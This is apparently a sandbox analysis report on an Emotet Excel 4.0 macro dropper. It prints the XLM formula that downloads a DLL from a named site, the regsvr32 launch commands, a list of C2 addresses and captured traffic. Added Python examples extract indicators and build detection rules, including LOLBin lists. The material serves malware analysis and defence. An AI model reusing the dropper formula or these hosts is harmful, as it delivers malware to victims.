Analysis

  • max time kernel
    153s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03/05/2022, 11:55 UTC

General

  • Target

    ?i=1hefannde.xlsm

  • Size

    50KB

  • MD5

    793c5a832ea9b3c4a225bc96b4449bc2

  • SHA1

    168afc78144b659b18b606a26c3e9a6343dd104a

  • SHA256

    894658b992050ab6d7ee061f083a48264ce56c1b4fbc5ac87c142765405a47f7

  • SHA512

    df041addb6c8113b2add5439f8ce258016233a47a13a3d540187872e4ac25fe3ac87b016bb391a703e0cb73189f1720c0e723b6df47ef971238312ed77a9b607

Malware Config

Extracted

  • Language
    xlm4.0
  • Source
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/", "..\rulm.dll")
  • URLs (xlm40.dropper)
    http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/
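The formula above is what the sandbox's XLM emulator recovered from the sheet: an Excel 4.0 CALL() into urlmon!URLDownloadToFileA with the payload URL and a relative drop path. As an added example (not part of the report and not tria.ge's own tooling), the Python below parses CALL() formulas the way a triage script would: it splits the argument list while honouring Excel's doubled-quote escaping, reads the type string (first letter is the return type, then one letter per argument), checks the arity against it, classifies the API, and pulls out URLs and file paths. Only the first sample formula comes from the report; the other two are constructed variants of the same technique.

```python
"""Pull download/execution IOCs out of Excel 4.0 (XLM) CALL() formulas.

Added example, not part of the tria.ge report: a small parser of the kind an
analyst runs over formulas recovered from a sheet. Only the first sample
formula comes from the report; the other two are constructed."""
import re

SAMPLE_FORMULAS = [
    # From the report's extracted config.
    '=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, '
    '"http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/", "..\\rulm.dll")',
    # Constructed variants of the same technique.
    '=CALL("Kernel32","CreateDirectoryA","JC","C:\\Dropped")',
    '=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","regsvr32.exe","-s ..\\rulm.dll",0,0)',
]

DOWNLOAD_APIS = {"urldownloadtofilea", "urldownloadtofilew", "urldownloadtofile"}
EXEC_APIS = {"shellexecutea", "shellexecutew", "winexec", "createprocessa", "createprocessw"}
CALL_RE = re.compile(r"^\s*=\s*CALL\s*\((.*)\)\s*$", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Drive-letter, UNC, relative (.\ ..\) or %VAR%-rooted Windows path.
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\|\.\.?\\|%\w+%)")


def split_args(arg_text):
    """Split a CALL() argument list on top-level commas.

    Excel strings are double-quoted and a literal quote inside one is written
    as two quotes (""), so a plain split(',') would break on URLs and paths
    containing commas. Quotes are stripped from the returned strings."""
    args, cur, in_str, i = [], [], False, 0
    while i < len(arg_text):
        ch = arg_text[i]
        if in_str:
            if ch == '"':
                if arg_text[i + 1:i + 2] == '"':   # doubled quote -> literal "
                    cur.append('"')
                    i += 2
                    continue
                in_str = False
            else:
                cur.append(ch)
        elif ch == '"':
            in_str = True
        elif ch == ",":
            args.append("".join(cur))
            cur = []
        elif not ch.isspace():
            cur.append(ch)
        i += 1
    args.append("".join(cur))
    return args


def parse_call(formula):
    """Describe a CALL() formula; return None for anything that is not one."""
    m = CALL_RE.match(formula)
    if not m:
        return None
    args = split_args(m.group(1))
    if len(args) < 3:
        return None
    dll, func, types, params = args[0], args[1], args[2], args[3:]
    f = func.lower()
    return {
        "dll": dll.lower(),
        "func": func,
        # First letter is the return type, then one letter per argument
        # (C = string, J = 32-bit int, B = double, ...), so arity is len-1.
        "types": types,
        "arity_ok": len(types) - 1 == len(params),
        "params": params,
        "urls": [p for p in params if URL_RE.match(p)],
        "paths": [p for p in params if PATH_RE.match(p)],
        "verdict": "download" if f in DOWNLOAD_APIS else "execute" if f in EXEC_APIS else "other",
    }


def extract_iocs(formulas):
    """Aggregate URLs, file paths and per-call verdicts across all CALL() formulas."""
    out = {"urls": [], "paths": [], "verdicts": []}
    for rec in filter(None, map(parse_call, formulas)):
        out["urls"] += rec["urls"]
        out["paths"] += rec["paths"]
        out["verdicts"].append((rec["dll"], rec["func"], rec["verdict"]))
    return out


if __name__ == "__main__":
    for dll, func, verdict in extract_iocs(SAMPLE_FORMULAS)["verdicts"]:
        print(f"{dll}!{func}: {verdict}")
```

The arity check is worth keeping: emulators and deobfuscators sometimes reconstruct a CALL() with the wrong number of arguments, and a type string that does not match the argument count is a sign the recovered formula should not be trusted verbatim.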

Extracted

  • Family
    emotet
  • Botnet
    Epoch4
  • C2
    68.183.94.239:80
    104.131.11.205:443
    138.197.109.175:8080
    187.84.80.182:443
    79.143.187.147:443
    216.158.226.206:443
    167.99.115.35:8080
    212.24.98.99:8080
    1.234.21.73:7080
    206.189.28.199:8080
    158.69.222.101:443
    164.68.99.3:8080
    188.44.20.25:443
    185.157.82.211:8080
    134.122.66.193:8080
    196.218.30.83:443
    72.15.201.15:8080
    5.9.116.246:8080
    176.104.106.96:8080
    153.126.146.25:7080
  • eck1.plain
    -----BEGIN PUBLIC KEY-----
    MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
    TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
    -----END PUBLIC KEY-----
  • ecs1.plain
    -----BEGIN PUBLIC KEY-----
    MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
    pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
    -----END PUBLIC KEY-----
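The two PEM blocks are the elliptic-curve public keys Emotet embeds for its C2 protocol (ECK1 is used for ECDH key agreement, ECS1 for verifying ECDSA signatures on C2 replies); they are stable per botnet epoch, which makes them a strong clustering IOC. As an added example, not from the report, here is a dependency-free Python check that confirms each key is a P-256 SubjectPublicKeyInfo, extracts the point, verifies it satisfies the curve equation (a garbled or hand-edited key fails this), and fingerprints the DER for matching against other samples. The two PEM strings are copied from the config above; everything else is constructed.

```python
"""Validate and fingerprint the ECC public keys from an Emotet config.

Added example, not part of the tria.ge report. No third-party library:
the DER layout of a P-256 SubjectPublicKeyInfo is fixed (26-byte header,
then 0x04 || X || Y), so the key can be checked against the curve equation
directly. The two PEM strings are the ones from the config above."""
import base64
import hashlib

ECK1_PEM = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----"""

ECS1_PEM = """-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----"""

# SEQUENCE { SEQUENCE { OID id-ecPublicKey, OID secp256r1 }, BIT STRING (0 unused bits) ...
SPKI_P256_PREFIX = bytes.fromhex(
    "3059" "3013" "06072a8648ce3d0201" "06082a8648ce3d030107" "034200")

# NIST P-256: y^2 = x^3 + a*x + b (mod p), with a = p - 3.
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
B = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B


def pem_to_der(pem):
    """Strip the PEM armour and base64-decode the body."""
    body = "".join(line.strip() for line in pem.strip().splitlines()
                   if not line.startswith("-----"))
    return base64.b64decode(body, validate=True)


def parse_p256_spki(der):
    """Return the (x, y) point of an uncompressed P-256 SubjectPublicKeyInfo.

    Anything else (other curve, compressed point, wrong length) raises."""
    if len(der) != 91 or not der.startswith(SPKI_P256_PREFIX):
        raise ValueError("not an uncompressed P-256 SubjectPublicKeyInfo")
    point = der[len(SPKI_P256_PREFIX):]
    if point[0] != 0x04:
        raise ValueError("expected uncompressed point encoding")
    return int.from_bytes(point[1:33], "big"), int.from_bytes(point[33:65], "big")


def on_curve(x, y):
    """True if (x, y) satisfies the P-256 curve equation."""
    return 0 <= x < P and 0 <= y < P and (y * y - (x * x * x + A * x + B)) % P == 0


def describe_key(pem):
    """Validate one key and return its coordinates and a DER fingerprint."""
    der = pem_to_der(pem)
    x, y = parse_p256_spki(der)
    return {
        "curve": "P-256",
        "x": x,
        "y": y,
        "on_curve": on_curve(x, y),
        # SHA-256 of the DER is a convenient IOC for matching other samples.
        "sha256": hashlib.sha256(der).hexdigest(),
    }


if __name__ == "__main__":
    for name, pem in (("ECK1", ECK1_PEM), ("ECS1", ECS1_PEM)):
        info = describe_key(pem)
        print(f"{name}: on_curve={info['on_curve']} sha256={info['sha256']}")
```

The on-curve test is the useful part: a key that decodes cleanly but fails the curve equation was mistranscribed somewhere between the binary and the report, and a fingerprint taken from it would never match another sample.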

Signatures

  • Emotet
    Emotet is a trojan that is primarily spread through spam emails.
  • Process spawned unexpected child process (1 IoC)
    This typically indicates the parent process was compromised via an exploit or macro.
  • Downloads MZ/PE file
  • Loads dropped DLL (2 IoCs)
  • Drops file in System32 directory (1 IoC)
  • Checks processor information in registry (2 TTPs, 3 IoCs)
    Processor information is often read in order to detect sandboxing environments.
  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of SetWindowsHookEx (12 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1hefannde.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\regsvr32.exe
        C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde"
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:3852
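The tree above carries two detection signals: EXCEL.EXE launching regsvr32.exe on a relative DLL path, and regsvr32 re-launching itself on a renamed copy of the same DLL (a .lde file, same hashes as rulm.dll) in a random SysWOW64 subdirectory. As an added example (not part of the report or of its signature set), the Python below encodes both as rules and runs them over a few constructed Sysmon-style process-creation records built from the page's PIDs and command lines, plus one benign regsvr32 baseline. The parent PID given for EXCEL.EXE is a placeholder, since the report does not show it.

```python
"""Turn the two anomalies in the process tree above into detection rules.

Added example, not part of the tria.ge report or its signature set. The
events are constructed Sysmon-style process-creation records using the PIDs
and command lines from the report, plus one benign regsvr32 baseline."""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
# What regsvr32 legitimately registers.
ALLOWED_MODULE_EXT = {".dll", ".ocx", ".ax", ".cpl"}
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

EVENTS = [
    # ppid 1 is a placeholder; the report does not show Excel's parent.
    {"pid": 3996, "ppid": 1,
     "image": r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1hefannde.xlsm"'},
    {"pid": 2480, "ppid": 3996,
     "image": r"C:\Windows\SysWow64\regsvr32.exe",
     "cmdline": r"C:\Windows\SysWow64\regsvr32.exe -s ..\rulm.dll"},
    {"pid": 3852, "ppid": 2480,
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde"'},
    # Constructed benign baseline: an installer registering its own COM server.
    {"pid": 5000, "ppid": 700,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\app.dll"'},
]


def basename(path):
    return ntpath.basename(path).lower()


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def regsvr32_module(cmdline):
    """Return the module regsvr32 was asked to (un)register, or None."""
    args = tokens(cmdline)[1:]
    modules = [a for a in args if not re.match(r"^[/-][sunie]", a, re.I)]
    return modules[-1] if modules else None


def module_reasons(module):
    """Why a regsvr32 module argument looks wrong; empty list means it looks normal."""
    reasons = []
    low = module.lower()
    if not re.match(r"^[a-z]:\\", low):
        reasons.append("relative path")
    if any(marker in low for marker in USER_WRITABLE_MARKERS):
        reasons.append("user-writable location")
    ext = ntpath.splitext(low)[1]
    if ext not in ALLOWED_MODULE_EXT:
        reasons.append(f"unexpected extension '{ext or '(none)'}'")
    return reasons


def evaluate(events):
    """Run both rules over the events; returns (pid, rule, detail) alerts."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        # Rule 1: an Office application spawning a living-off-the-land binary.
        if parent and basename(parent["image"]) in OFFICE_APPS and child in LOLBINS:
            alerts.append((e["pid"], "office-spawned-lolbin",
                           f"{basename(parent['image'])} -> {child}"))
        # Rule 2: regsvr32 registering something that does not look like a real COM DLL.
        if child == "regsvr32.exe":
            module = regsvr32_module(e["cmdline"])
            reasons = module_reasons(module) if module else ["no module argument"]
            if reasons:
                alerts.append((e["pid"], "regsvr32-unusual-module",
                               f"{module}: {', '.join(reasons)}"))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in evaluate(EVENTS):
        print(f"PID {pid} [{rule}] {detail}")
```

Rule 2 deliberately does not try to resolve the relative path: regsvr32 inherits Excel's working directory, which the report does not record (the file landed at C:\Users\Admin\rulm.dll), and a relative module argument is suspicious on its own.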

Network

  • DNS [US] harleyqueretaro.com (EXCEL.EXE)
    Remote address: 8.8.8.8:53
    Request: harleyqueretaro.com IN A
    Response: harleyqueretaro.com IN A 63.247.138.144
  • GET [US] http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ (EXCEL.EXE)
    Remote address: 63.247.138.144:80
    Request
    GET /renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: harleyqueretaro.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 03 May 2022 12:01:23 GMT
    Server: Apache
    X-Powered-By: PHP/5.6.40
    Set-Cookie: 6271199321c21=1651579283; expires=Tue, 03-May-2022 12:02:23 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Tue, 03 May 2022 12:01:23 GMT
    Expires: Tue, 03 May 2022 12:01:23 GMT
    Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"
    Content-Transfer-Encoding: binary
    Content-Length: 868352
    Connection: close
    Content-Type: application/x-msdownload

  Connections

    Destination          Domain               Proto  Process    Sent     Received  Pkts out  Pkts in
    8.238.21.126:80      -                    -      -          322 B    -         7         -
    93.184.220.29:80     -                    -      -          322 B    -         7         -
    52.178.17.2:443      -                    -      -          322 B    -         7         -
    104.110.191.140:80   -                    -      -          322 B    -         7         -
    104.110.191.140:80   -                    -      -          322 B    -         7         -
    104.110.191.140:80   -                    -      -          322 B    -         7         -
    63.247.138.144:80    harleyqueretaro.com  http   EXCEL.EXE  30.1kB   894.6kB   646       642
    8.8.8.8:53           harleyqueretaro.com  dns    EXCEL.EXE  65 B     81 B      1         1

    63.247.138.144:80  HTTP request: GET http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/  HTTP response: 200
    8.8.8.8:53         DNS request: harleyqueretaro.com  DNS response: 63.247.138.144
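The captured exchange has everything a network detector needs: an Office process sending the IE-style User-Agent that WinINet/urlmon uses for non-browser callers, a URL path with no file name, a Content-Disposition naming a .dll, an application/x-msdownload Content-Type, and a body that starts with MZ. As an added example (not part of the report), the Python below classifies that exchange the way a proxy or EDR rule would. The URL, User-Agent and response headers are copied from the capture above; the 868,352-byte DLL body is replaced by a constructed stub carrying just enough of a PE header for the checks, so Content-Length is set to the stub's length rather than the captured value.

```python
"""Classify the captured HTTP exchange the way a proxy/EDR rule would.

Added example, not part of the tria.ge report. The request URL, User-Agent
and response headers are the ones captured above; the DLL body is replaced
by a constructed stub with just enough of a PE header for the checks."""
import posixpath
import re
from urllib.parse import urlsplit

URL = "http://harleyqueretaro.com/renew2019/Back2016-12-22/cv/data/RjuiFMp4Fsp/"
USER_AGENT = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; "
              ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")
CAPTURED_HEADERS = [
    "HTTP/1.1 200 OK",
    "Date: Tue, 03 May 2022 12:01:23 GMT",
    "Server: Apache",
    "X-Powered-By: PHP/5.6.40",
    "Cache-Control: no-cache, must-revalidate",
    "Pragma: no-cache",
    'Content-Disposition: attachment; filename="illkVUA0aCB42y28qRyvY91Mq6.dll"',
    "Content-Transfer-Encoding: binary",
    "Connection: close",
    "Content-Type: application/x-msdownload",
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-msdos-program",
                    "application/vnd.microsoft.portable-executable"}
PE_EXTENSIONS = {".dll", ".exe", ".ocx", ".scr", ".sys", ".cpl"}
# The IE-style User-Agent that WinINet/urlmon sends on behalf of non-browser callers.
URLMON_UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE \d")


def build_stub_pe():
    """Constructed MZ/PE stub: DOS header whose e_lfanew points at 'PE\\0\\0' + i386 machine."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)          # 0x40 bytes of DOS header
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew
    return bytes(dos) + b"PE\0\0" + (0x14C).to_bytes(2, "little") + b"\0" * 18


def build_response(header_lines, body):
    """Assemble raw response bytes; Content-Length is derived from the body."""
    lines = header_lines + [f"Content-Length: {len(body)}"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def parse_response(raw):
    """Split raw bytes into (status, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def is_pe(body):
    """MZ magic plus a valid e_lfanew pointing at the PE signature."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(body[0x3C:0x40], "little")
    return body[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def disposition_filename(headers):
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""), re.I)
    return m.group(1) if m else None


def classify(url, process, user_agent, raw_response):
    """Return (tag, detail) findings for one download; an empty list means nothing odd."""
    status, headers, body = parse_response(raw_response)
    findings = []
    if status != 200:
        return findings
    proc = process.lower()
    pe = is_pe(body)
    if pe:
        findings.append(("pe-body", "response body is an MZ/PE image"))
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype in EXECUTABLE_TYPES:
        findings.append(("executable-content-type", ctype))
    name = disposition_filename(headers)
    url_tail = urlsplit(url).path.rsplit("/", 1)[-1]
    if name and posixpath.splitext(name)[1].lower() in PE_EXTENSIONS \
            and posixpath.splitext(url_tail)[1].lower() not in PE_EXTENSIONS:
        findings.append(("disguised-url", f"path ending '/{url_tail}' serves '{name}'"))
    if proc in OFFICE_APPS and pe:
        findings.append(("office-download", f"{process} fetched an executable"))
    if proc not in BROWSERS and URLMON_UA_RE.match(user_agent):
        findings.append(("urlmon-user-agent", f"{process} sent an IE User-Agent"))
    return findings


if __name__ == "__main__":
    raw = build_response(CAPTURED_HEADERS, build_stub_pe())
    for tag, detail in classify(URL, "EXCEL.EXE", USER_AGENT, raw):
        print(f"[{tag}] {detail}")
```

The body check is the one that survives server-side changes: the Content-Type, the Content-Disposition name and the URL shape are all under the operator's control and rotate between campaigns, while a DLL that regsvr32 can load still has to start with MZ and carry a PE header.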

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\rulm.dll

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • C:\Windows\SysWOW64\Jfjnwdsahcjjsv\bqck.lde

    Filesize

    848KB

    MD5

    26bf9a27e1ae4680db6c0528579aa5d5

    SHA1

    1c606018e5dc1bd2189b88216ea82c59f72449e9

    SHA256

    7a2b948dfa606620068203247663247cb95c4a64fde2fa6e522a0a2828027352

    SHA512

    d91d47ac63a24fed894e460e4d03fe2f23636d0f1a561f267007e0d1910424f437a3c8a38100c6b81c2824c50a76cc3c777158023608643f83c29545fcf6b2fb

  • memory/2480-140-0x0000000002401000-0x0000000002421000-memory.dmp

    Filesize

    128KB

  • memory/2480-141-0x0000000002400000-0x0000000002424000-memory.dmp

    Filesize

    144KB

  • memory/3852-145-0x0000000002EF0000-0x0000000002F14000-memory.dmp

    Filesize

    144KB

  • memory/3996-133-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-136-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

    Filesize

    64KB

  • memory/3996-135-0x00007FFC93100000-0x00007FFC93110000-memory.dmp

    Filesize

    64KB

  • memory/3996-134-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-130-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-132-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB

  • memory/3996-131-0x00007FFC95270000-0x00007FFC95280000-memory.dmp

    Filesize

    64KB